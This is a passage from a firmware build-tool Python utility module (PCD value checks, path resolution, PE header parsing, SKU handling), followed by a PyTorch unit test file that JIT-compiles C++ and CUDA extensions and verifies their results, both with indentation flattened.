if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
Value = FieldList[0]
Size = ''
if len(FieldList) > 1 and FieldList[1]:
DataType = FieldList[1]
if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
IsValid = False
if len(FieldList) > 2:
Size = FieldList[2]
if IsValid:
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [str(Value), DataType, str(Size)], IsValid, 0
elif PcdType == MODEL_PCD_FEATURE_FLAG:
Value = FieldList[0]
Size = ''
IsValid = (len(FieldList) <= 1)
return [Value, DataType, str(Size)], IsValid, 0
elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
VpdOffset = FieldList[0]
Value = Size = ''
if not DataType == TAB_VOID:
if len(FieldList) > 1:
Value = FieldList[1]
else:
if len(FieldList) > 1:
Size = FieldList[1]
if len(FieldList) > 2:
Value = FieldList[2]
if DataType == "":
IsValid = (len(FieldList) <= 1)
else:
IsValid = (len(FieldList) <= 3)
if Size:
try:
int(Size, 16) if Size.upper().startswith("0X") else int(Size)
except:
IsValid = False
Size = -1
return [VpdOffset, str(Size), Value], IsValid, 2
elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
IsValid = (3 <= len(FieldList) <= 5)
HiiString = FieldList[0]
Guid = Offset = Value = Attribute = ''
if len(FieldList) > 1:
Guid = FieldList[1]
if len(FieldList) > 2:
Offset = FieldList[2]
if len(FieldList) > 3:
Value = FieldList[3]
if len(FieldList) > 4:
Attribute = FieldList[4]
return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
return [], False, 0
## AnalyzePcdData
#
# Analyze the pcd Value, Datum type and TokenNumber.
# Used to avoid split issue while the value string contain "|" character
#
# @param[in] Setting: A String contain value/datum type/token number information;
#
# @retval ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
ValueList = ['', '', '']
ValueRe = re.compile(r'^\s*L?\".*\|.*\"')
PtrValue = ValueRe.findall(Setting)
ValueUpdateFlag = False
if len(PtrValue) >= 1:
Setting = re.sub(ValueRe, '', Setting)
ValueUpdateFlag = True
TokenList = Setting.split(TAB_VALUE_SPLIT)
ValueList[0:len(TokenList)] = TokenList
if ValueUpdateFlag:
ValueList[0] = PtrValue[0]
return ValueList
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
if Type == TAB_VOID:
ValueRe = re.compile(r'\s*L?\".*\"\s*$')
if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
or (Value.startswith('{') and Value.endswith('}')) or (Value.startswith("L'") or Value.startswith("'") and Value.endswith("'"))
):
return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
elif ValueRe.match(Value):
# Check the chars in UnicodeString or CString is printable
if Value.startswith("L"):
Value = Value[2:-1]
else:
Value = Value[1:-1]
Printset = set(string.printable)
Printset.remove(TAB_PRINTCHAR_VT)
Printset.add(TAB_PRINTCHAR_BS)
Printset.add(TAB_PRINTCHAR_NUL)
if not set(Value).issubset(Printset):
PrintList = sorted(Printset)
return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
elif Type == 'BOOLEAN':
if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
if Value.startswith('0') and not Value.lower().startswith('0x') and len(Value) > 1 and Value.lstrip('0'):
Value = Value.lstrip('0')
try:
if Value and int(Value, 0) < 0:
return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
Value = int(Value, 0)
if Value > MAX_VAL_TYPE[Type]:
return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
except:
return False, "Invalid value [%s] of type [%s];"\
" must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
else:
return True, "StructurePcd"
return True, ""
def CommonPath(PathList):
P1 = min(PathList).split(os.path.sep)
P2 = max(PathList).split(os.path.sep)
for Index in range(min(len(P1), len(P2))):
if P1[Index] != P2[Index]:
return os.path.sep.join(P1[:Index])
return os.path.sep.join(P1)
class PathClass(object):
def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
self.Arch = Arch
self.File = str(File)
if os.path.isabs(self.File):
self.Root = ''
self.AlterRoot = ''
else:
self.Root = str(Root)
self.AlterRoot = str(AlterRoot)
# Remove any '.' and '..' in path
if self.Root:
self.Root = mws.getWs(self.Root, self.File)
self.Path = os.path.normpath(os.path.join(self.Root, self.File))
self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
# eliminate the side-effect of 'C:'
if self.Root[-1] == ':':
self.Root += os.path.sep
# file path should not start with path separator
if self.Root[-1] == os.path.sep:
self.File = self.Path[len(self.Root):]
else:
self.File = self.Path[len(self.Root) + 1:]
else:
self.Path = os.path.normpath(self.File)
self.SubDir, self.Name = os.path.split(self.File)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.Root:
if self.SubDir:
self.Dir = os.path.join(self.Root, self.SubDir)
else:
self.Dir = self.Root
else:
self.Dir = self.SubDir
if IsBinary:
self.Type = Type
else:
self.Type = self.Ext.lower()
self.IsBinary = IsBinary
self.Target = Target
self.TagName = TagName
self.ToolCode = ToolCode
self.ToolChainFamily = ToolChainFamily
## Convert the object of this class to a string
#
# Convert member Path of the class to a string
#
# @retval string Formatted String
#
def __str__(self):
return self.Path
## Override __eq__ function
#
# Check whether PathClass are the same
#
# @retval False The two PathClass are different
# @retval True The two PathClass are the same
#
def __eq__(self, Other):
return self.Path == str(Other)
## Override __cmp__ function
#
# Customize the comparison operation of two PathClass
#
# @retval 0 The two PathClass are different
# @retval -1 The first PathClass is less than the second PathClass
# @retval 1 The first PathClass is Bigger than the second PathClass
def __cmp__(self, Other):
OtherKey = str(Other)
SelfKey = self.Path
if SelfKey == OtherKey:
return 0
elif SelfKey > OtherKey:
return 1
else:
return -1
## Override __hash__ function
#
# Use Path as key in hash table
#
# @retval string Key for hash table
#
def __hash__(self):
return hash(self.Path)
@cached_property
def Key(self):
return self.Path.upper()
@property
def TimeStamp(self):
return os.stat(self.Path)[8]
def Validate(self, Type='', CaseSensitive=True):
def RealPath2(File, Dir='', OverrideDir=''):
NewFile = None
if OverrideDir:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(OverrideDir, File))]
if NewFile:
if OverrideDir[-1] == os.path.sep:
return NewFile[len(OverrideDir):], NewFile[0:len(OverrideDir)]
else:
return NewFile[len(OverrideDir) + 1:], NewFile[0:len(OverrideDir)]
if GlobalData.gAllFiles:
NewFile = GlobalData.gAllFiles[os.path.normpath(os.path.join(Dir, File))]
if not NewFile:
NewFile = os.path.normpath(os.path.join(Dir, File))
if not os.path.exists(NewFile):
return None, None
if NewFile:
if Dir:
if Dir[-1] == os.path.sep:
return NewFile[len(Dir):], NewFile[0:len(Dir)]
else:
return NewFile[len(Dir) + 1:], NewFile[0:len(Dir)]
else:
return NewFile, ''
return None, None
if GlobalData.gCaseInsensitive:
CaseSensitive = False
if Type and Type.lower() != self.Type:
return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
if not RealRoot and not RealFile:
RealFile = self.File
if self.AlterRoot:
RealFile = os.path.join(self.AlterRoot, self.File)
elif self.Root:
RealFile = os.path.join(self.Root, self.File)
if len (mws.getPkgPath()) == 0:
return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
else:
return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
ErrorCode = 0
ErrorInfo = ''
if RealRoot != self.Root or RealFile != self.File:
if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
ErrorCode = FILE_CASE_MISMATCH
ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
self.SubDir, self.Name = os.path.split(RealFile)
self.BaseName, self.Ext = os.path.splitext(self.Name)
if self.SubDir:
self.Dir = os.path.join(RealRoot, self.SubDir)
else:
self.Dir = RealRoot
self.File = RealFile
self.Root = RealRoot
self.Path = os.path.join(RealRoot, RealFile)
return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
## Constructor
#
# @param File FilePath of PeImage
#
def __init__(self, PeFile):
self.FileName = PeFile
self.IsValid = False
self.Size = 0
self.EntryPoint = 0
self.SectionAlignment = 0
self.SectionHeaderList = []
self.ErrorInfo = ''
try:
PeObject = open(PeFile, 'rb')
except:
self.ErrorInfo = self.FileName + ' can not be found\n'
return
# Read DOS header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x3E)
ByteList = ByteArray.tolist()
# DOS signature should be 'MZ'
if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
return
# Read 4 byte PE Signature
PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
PeObject.seek(PeOffset)
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
if ByteArray.tostring() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
MULTIPLE =2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either a integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## DeepCopy dict/OrderedDict recusively
#
# @param ori_dict a nested dict or ordereddict
#
# @retval new dict or orderdict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
return re.sub('//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
|
test_cpp_extensions_jit.py
|
# Owner(s): ["module: cpp-extensions"]
import os
import shutil
import sys
import unittest
import warnings
import re
import tempfile
import subprocess
import glob
import textwrap
from multiprocessing import Process
import torch.testing._internal.common_utils as common
import torch
import torch.backends.cudnn
import torch.utils.cpp_extension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
from torch.testing._internal.common_utils import gradcheck, TEST_WITH_ASAN, has_breakpad
TEST_CUDA = torch.cuda.is_available() and CUDA_HOME is not None
TEST_CUDNN = False
TEST_ROCM = torch.cuda.is_available() and torch.version.hip is not None and ROCM_HOME is not None
if TEST_CUDA and torch.version.cuda is not None: # the skip CUDNN test for ROCm
CUDNN_HEADER_EXISTS = os.path.isfile(os.path.join(CUDA_HOME, "include/cudnn.h"))
TEST_CUDNN = (
TEST_CUDA and CUDNN_HEADER_EXISTS and torch.backends.cudnn.is_available()
)
IS_WINDOWS = sys.platform == "win32"
def remove_build_path():
if sys.platform == "win32":
print("Not wiping extensions build folder because Windows")
return
default_build_root = torch.utils.cpp_extension.get_default_build_root()
if os.path.exists(default_build_root):
shutil.rmtree(default_build_root)
class TestCppExtensionJIT(common.TestCase):
"""Tests just-in-time cpp extensions.
Don't confuse this with the PyTorch JIT (aka TorchScript).
"""
def setUp(self):
super().setUp()
# cpp extensions use relative paths. Those paths are relative to
# this file, so we'll change the working directory temporarily
self.old_working_dir = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(__file__)))
def tearDown(self):
super().tearDown()
# return the working directory (see setUp)
os.chdir(self.old_working_dir)
@classmethod
def setUpClass(cls):
remove_build_path()
@classmethod
def tearDownClass(cls):
remove_build_path()
def test_jit_compile_extension(self):
module = torch.utils.cpp_extension.load(
name="jit_extension",
sources=[
"cpp_extensions/jit_extension.cpp",
"cpp_extensions/jit_extension2.cpp",
],
extra_include_paths=["cpp_extensions"],
extra_cflags=["-g"],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
# Checking we can call a method defined not in the main C++ file.
z = module.exp_add(x, y)
self.assertEqual(z, x.exp() + y.exp())
# Checking we can use this JIT-compiled class.
doubler = module.Doubler(2, 2)
self.assertIsNone(doubler.get().grad)
self.assertEqual(doubler.get().sum(), 4)
self.assertEqual(doubler.forward().sum(), 8)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_jit_cuda_extension(self):
# NOTE: The name of the extension must equal the name of the module.
module = torch.utils.cpp_extension.load(
name="torch_test_cuda_extension",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
keep_intermediates=False,
)
x = torch.zeros(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
z = module.sigmoid_add(x, y).cpu()
# 2 * sigmoid(0) = 2 * 0.5 = 1
self.assertEqual(z, torch.ones_like(z))
def _run_jit_cuda_archflags(self, flags, expected):
# Compile an extension with given `flags`
def _check_cuobjdump_output(expected_values, is_ptx=False):
elf_or_ptx = '--list-ptx' if is_ptx else '--list-elf'
lib_ext = '.pyd' if IS_WINDOWS else '.so'
# Note, .extension name may include _v1, _v2, so first find exact name
ext_filename = glob.glob(os.path.join(temp_dir,
'cudaext_archflag*' + lib_ext))[0]
command = ['cuobjdump', elf_or_ptx, ext_filename]
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, err = p.communicate()
output = output.decode("ascii")
err = err.decode("ascii")
if not p.returncode == 0 or not err == '':
raise AssertionError("Flags: {}\nReturncode: {}\nStderr: {}\n"
"Output: {} ".format(flags, p.returncode,
err, output))
actual_arches = sorted(re.findall(r'sm_\d\d', output))
expected_arches = sorted(['sm_' + xx for xx in expected_values])
self.assertEqual(actual_arches, expected_arches,
msg="Flags: {}, Actual: {}, Expected: {}\n"
"Stderr: {}\nOutput: {}".format(
flags, actual_arches, expected_arches,
err, output))
temp_dir = tempfile.mkdtemp()
old_envvar = os.environ.get('TORCH_CUDA_ARCH_LIST', None)
try:
os.environ['TORCH_CUDA_ARCH_LIST'] = flags
torch.utils.cpp_extension.load(
name="cudaext_archflags",
sources=[
"cpp_extensions/cuda_extension.cpp",
"cpp_extensions/cuda_extension.cu",
],
extra_cuda_cflags=["-O2"],
verbose=True,
build_directory=temp_dir,
)
# Expected output for --list-elf:
# ELF file 1: cudaext_archflags.1.sm_61.cubin
# ELF file 2: cudaext_archflags.2.sm_52.cubin
_check_cuobjdump_output(expected[0])
if expected[1] is not None:
# Expected output for --list-ptx:
# PTX file 1: cudaext_archflags.1.sm_61.ptx
_check_cuobjdump_output(expected[1], is_ptx=True)
finally:
if IS_WINDOWS:
print("Not wiping extensions build folder because Windows")
else:
shutil.rmtree(temp_dir)
if old_envvar is None:
os.environ.pop('TORCH_CUDA_ARCH_LIST')
else:
os.environ['TORCH_CUDA_ARCH_LIST'] = old_envvar
@unittest.skipIf(not TEST_CUDA, "CUDA not found")
@unittest.skipIf(TEST_ROCM, "disabled on rocm")
def test_jit_cuda_archflags(self):
# Test a number of combinations:
# - the default for the machine we're testing on
# - Separators, can be ';' (most common) or ' '
# - Architecture names
# - With/without '+PTX'
n = torch.cuda.device_count()
capabilities = {torch.cuda.get_device_capability(i) for i in range(n)}
# expected values is length-2 tuple: (list of ELF, list of PTX)
# note: there should not be more than one PTX value
archflags = {
'': (['{}{}'.format(capability[0], capability[1]) for capability in capabilities], None),
"Maxwell+Tegra;6.1": (['53', '61'], None),
"Pascal 3.5": (['35', '60', '61'], None),
"Volta": (['70'], ['70']),
}
if int(torch.version.cuda.split('.')[0]) >= 10:
# CUDA 9 only supports compute capability <= 7.2
archflags["7.5+PTX"] = (['75'], ['75'])
archflags["5.0;6.0+PTX;7.0;7.5"] = (['50', '60', '70', '75'], ['60'])
for flags, expected in archflags.items():
self._run_jit_cuda_archflags(flags, expected)
@unittest.skipIf(not TEST_CUDNN, "CuDNN not found")
def test_jit_cudnn_extension(self):
# implementation of CuDNN ReLU
if IS_WINDOWS:
extra_ldflags = ["cudnn.lib"]
else:
extra_ldflags = ["-lcudnn"]
module = torch.utils.cpp_extension.load(
name="torch_test_cudnn_extension",
sources=["cpp_extensions/cudnn_extension.cpp"],
extra_ldflags=extra_ldflags,
verbose=True,
with_cuda=True,
)
x = torch.randn(100, device="cuda", dtype=torch.float32)
y = torch.zeros(100, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y) # y=relu(x)
self.assertEqual(torch.nn.functional.relu(x), y)
with self.assertRaisesRegex(RuntimeError, "same size"):
y_incorrect = torch.zeros(20, device="cuda", dtype=torch.float32)
module.cudnn_relu(x, y_incorrect)
def test_inline_jit_compile_extension_with_functions_as_list(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_list",
cpp_sources=cpp_source,
functions="tanh_add",
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "tanh_add")
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.tanh_add(x, y)
self.assertEqual(z, x.tanh() + y.tanh())
def test_inline_jit_compile_extension_with_functions_as_dict(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_with_functions_dict",
cpp_sources=cpp_source,
functions={"tanh_add": "Tanh and then sum :D"},
verbose=True,
)
self.assertEqual(module.tanh_add.__doc__.split("\n")[2], "Tanh and then sum :D")
def test_inline_jit_compile_extension_multiple_sources_and_no_functions(self):
cpp_source1 = """
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y) {
return x.sin() + y.sin();
}
"""
cpp_source2 = """
#include <torch/extension.h>
torch::Tensor sin_add(torch::Tensor x, torch::Tensor y);
PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {
m.def("sin_add", &sin_add, "sin(x) + sin(y)");
}
"""
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension",
cpp_sources=[cpp_source1, cpp_source2],
verbose=True,
)
x = torch.randn(4, 4)
y = torch.randn(4, 4)
z = module.sin_add(x, y)
self.assertEqual(z, x.sin() + y.sin())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_extension_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data<float>(), y.data<float>(), output.data<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = "torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);"
module = torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
functions=["cos_add"],
verbose=True,
)
self.assertEqual(module.cos_add.__doc__.split("\n")[2], "cos_add")
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = module.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
@unittest.skip("Temporarily disabled")
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_inline_jit_compile_custom_op_cuda(self):
cuda_source = """
__global__ void cos_add_kernel(
const float* __restrict__ x,
const float* __restrict__ y,
float* __restrict__ output,
const int size) {
const auto index = blockIdx.x * blockDim.x + threadIdx.x;
if (index < size) {
output[index] = __cosf(x[index]) + __cosf(y[index]);
}
}
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y) {
auto output = torch::zeros_like(x);
const int threads = 1024;
const int blocks = (output.numel() + threads - 1) / threads;
cos_add_kernel<<<blocks, threads>>>(x.data_ptr<float>(), y.data_ptr<float>(), output.data_ptr<float>(), output.numel());
return output;
}
"""
# Here, the C++ source need only declare the function signature.
cpp_source = """
#include <torch/library.h>
torch::Tensor cos_add(torch::Tensor x, torch::Tensor y);
TORCH_LIBRARY(inline_jit_extension_custom_op_cuda, m) {
m.def("cos_add", cos_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="inline_jit_extension_custom_op_cuda",
cpp_sources=cpp_source,
cuda_sources=cuda_source,
verbose=True,
is_python_module=False,
)
x = torch.randn(4, 4, device="cuda", dtype=torch.float32)
y = torch.randn(4, 4, device="cuda", dtype=torch.float32)
z = torch.ops.inline_jit_extension_custom_op_cuda.cos_add(x, y)
self.assertEqual(z, x.cos() + y.cos())
def test_inline_jit_compile_extension_throws_when_functions_is_bad(self):
with self.assertRaises(ValueError):
torch.utils.cpp_extension.load_inline(
name="invalid_jit_extension", cpp_sources="", functions=5
)
def test_lenient_flag_handling_in_jit_extensions(self):
cpp_source = """
torch::Tensor tanh_add(torch::Tensor x, torch::Tensor y) {
return x.tanh() + y.tanh();
}
"""
module = torch.utils.cpp_extension.load_inline(
name="lenient_flag_handling_extension",
cpp_sources=cpp_source,
functions="tanh_add",
extra_cflags=["-g\n\n", "-O0 -Wall"],
extra_include_paths=[" cpp_extensions\n"],
verbose=True,
)
x = torch.zeros(100, dtype=torch.float32)
y = torch.zeros(100, dtype=torch.float32)
z = module.tanh_add(x, y).cpu()
self.assertEqual(z, x.tanh() + y.tanh())
@unittest.skip("Temporarily disabled")
